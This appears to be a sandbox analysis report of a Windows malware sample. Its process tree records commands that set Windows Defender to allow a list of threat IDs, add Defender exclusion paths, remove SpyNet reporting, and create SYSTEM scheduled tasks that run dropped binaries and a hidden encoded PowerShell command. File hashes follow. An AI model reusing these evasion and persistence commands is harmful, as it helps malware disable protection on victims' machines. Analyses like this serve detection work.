C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2264
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1336
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DGyuesllMrTyYUlUupR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DGyuesllMrTyYUlUupR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GUqtXLpkCnEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GUqtXLpkCnEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RjxgDONkleUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RjxgDONkleUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XjmuJHxLjXQtC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XjmuJHxLjXQtC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bHfaALlsU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bHfaALlsU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pjzNRCemcPOgEmVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pjzNRCemcPOgEmVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\hKdaKKmxcqpbfbjVy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\hKdaKKmxcqpbfbjVy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\PJXqPLeKMmGmmJnl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\PJXqPLeKMmGmmJnl\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGyuesllMrTyYUlUupR" /t REG_DWORD /d 0 /reg:323⤵PID:4800
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGyuesllMrTyYUlUupR" /t REG_DWORD /d 0 /reg:324⤵PID:1148
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGyuesllMrTyYUlUupR" /t REG_DWORD /d 0 /reg:643⤵PID:4364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GUqtXLpkCnEU2" /t REG_DWORD /d 0 /reg:323⤵PID:2292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GUqtXLpkCnEU2" /t REG_DWORD /d 0 /reg:643⤵PID:5084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RjxgDONkleUn" /t REG_DWORD /d 0 /reg:323⤵PID:3972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RjxgDONkleUn" /t REG_DWORD /d 0 /reg:643⤵PID:5100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XjmuJHxLjXQtC" /t REG_DWORD /d 0 /reg:323⤵PID:1496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XjmuJHxLjXQtC" /t REG_DWORD /d 0 /reg:643⤵PID:4600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHfaALlsU" /t REG_DWORD /d 0 /reg:323⤵PID:2568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHfaALlsU" /t REG_DWORD /d 0 /reg:643⤵PID:4524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pjzNRCemcPOgEmVB /t REG_DWORD /d 0 /reg:323⤵PID:1636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pjzNRCemcPOgEmVB /t REG_DWORD /d 0 /reg:643⤵PID:3700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\hKdaKKmxcqpbfbjVy /t REG_DWORD /d 0 /reg:323⤵PID:2228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\hKdaKKmxcqpbfbjVy /t REG_DWORD /d 0 /reg:643⤵PID:3932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\PJXqPLeKMmGmmJnl /t REG_DWORD /d 0 /reg:323⤵PID:540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\PJXqPLeKMmGmmJnl /t REG_DWORD /d 0 /reg:643⤵PID:4616
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXeWkcoNr" /SC once /ST 02:24:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXeWkcoNr"2⤵PID:4144
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXeWkcoNr"2⤵PID:4728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VOlfEanzNQbmEDmfi" /SC once /ST 05:58:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\PJXqPLeKMmGmmJnl\uRREQcoFSGABsXB\ZbyFFTD.exe\" dy /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1812
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "VOlfEanzNQbmEDmfi"2⤵PID:1592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3092 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5076
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1736
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2036
-
C:\Windows\Temp\PJXqPLeKMmGmmJnl\uRREQcoFSGABsXB\ZbyFFTD.exeC:\Windows\Temp\PJXqPLeKMmGmmJnl\uRREQcoFSGABsXB\ZbyFFTD.exe dy /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2648 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "btUIxhnquogiJgiDhn"2⤵PID:1780
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3040
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4420
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:1028
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4608
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\bHfaALlsU\OiwlFH.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "KaswbVYNVAppCRz" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KaswbVYNVAppCRz2" /F /xml "C:\Program Files (x86)\bHfaALlsU\kIvSMlz.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:716
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "KaswbVYNVAppCRz"2⤵PID:692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KaswbVYNVAppCRz"2⤵PID:4660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XcLREFpZqJkNmG" /F /xml "C:\Program Files (x86)\GUqtXLpkCnEU2\WAjjpvD.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yswweVrNDJoUL2" /F /xml "C:\ProgramData\pjzNRCemcPOgEmVB\pTKirnW.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zWMWDHawoZoNmfpXd2" /F /xml "C:\Program Files (x86)\DGyuesllMrTyYUlUupR\nKpviZE.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uQFNfplRxlMeminzxOr2" /F /xml "C:\Program Files (x86)\XjmuJHxLjXQtC\UDDQLIX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CSoaXjyDtIeTBsrxa" /SC once /ST 03:42:32 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\PJXqPLeKMmGmmJnl\UGPIUJpw\ffyiEfK.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CSoaXjyDtIeTBsrxa"2⤵PID:3232
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4212
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:2908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:1264
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4160
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VOlfEanzNQbmEDmfi"2⤵PID:4616
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PJXqPLeKMmGmmJnl\UGPIUJpw\ffyiEfK.dll",#1 /site_id 5254031⤵PID:3740
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PJXqPLeKMmGmmJnl\UGPIUJpw\ffyiEfK.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3980 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CSoaXjyDtIeTBsrxa"3⤵PID:4596
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f7f69fdeb906f63eb66b49af4421a960
SHA1ab2c6d1cb09bb9db7759dca821f606e4f21b8142
SHA25644581566b16c523e47e23dd9e7fa0777a41e7e6e60166670da077d818333a752
SHA512f2caa956880c64bf50384a2a064658cd39fce0300da4abc4e9b963e6ff45c709b5a40692c2cc3cd882cf00d11c6818605a759058c8942ea9661e230d7106b780
-
Filesize
2KB
MD50001a104125d36c90567aa6536faa17a
SHA19e263cde265058efe9419f59566ea3271c7dd4c3
SHA25616bfdf4ec7874febce3b8cbf2deaf640865c85353050c76d019895c2f08d537a
SHA5124bd4700bdea1bdefbe128e5b7c439cdea06b821f3dbac6034703d933451e37c80641ce20de6f76e1dcdc203841e05ede53e68292a029d1edc0fb3c75426fda5e
-
Filesize
2KB
MD5d7218bb883811d9d25363abb53a9851e
SHA148463dc3a0a864ab6e4528b174a622e9cdab407f
SHA25641cf738df2ef8712c69d99c1347d180a70632f8874bfaf8421e63f3ef4f2be4b
SHA5124a6ee30d2794366f0692358eb526ddf680469f4dc06686cef70a5a03092ffeb6ec301a125964fbd91537786bb5810ee638ac906116e774d5c8a9716b9edd4cb0
-
Filesize
2KB
MD555951765fbb3e1cb9d9c1d9611c2a413
SHA1d6bd0ec9c2ab631d915398805abe1b65432f73d9
SHA2563bebe1d09d6757027b7e6cd95c18bf502397a1ca710d08b0e6e9449fd8cc6f28
SHA512640b28c08103d4e9890bc4a6bf752360310005da7f23b676b667df5c2d2c26a23de45cbd693d45bed1067699f36329329c18c0e63ff2cf0fe439c5da64869800
-
Filesize
2KB
MD57c73a017d40bb346884acc0744f25c99
SHA1c30fda8d1c038f220cb97f479fe603187dda3280
SHA2560008caa87452eec777616f2c3f3e7d01211ca99865215397aa9d3a9993091dbf
SHA5120b7fda1bc0d883e9cb41a0630b98c02664ee1465442af127b10af2bcff176629ca5b973e7802afda1d6222dbe03ee328e85c7bf51afc8ea508e5310938945999
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
6.2MB
MD5d5a27be6c21a41889e0dc8da0ba298de
SHA170fb4bcb9466094ed13356d20f71178a5158aca7
SHA256f983cbfa81f9225628bd1d70549ea7fe381463bc576c0d5e206242e8326364d4
SHA5127bb39fc58969cd83d3e9b539881f1b2ddd8a701b4f0a93d06079539002bf5cf23d0f8f5b8c3e8c502dd7d57d1e9cf6cb49b9acc729d54e32f56c4159499eb077
-
Filesize
6.2MB
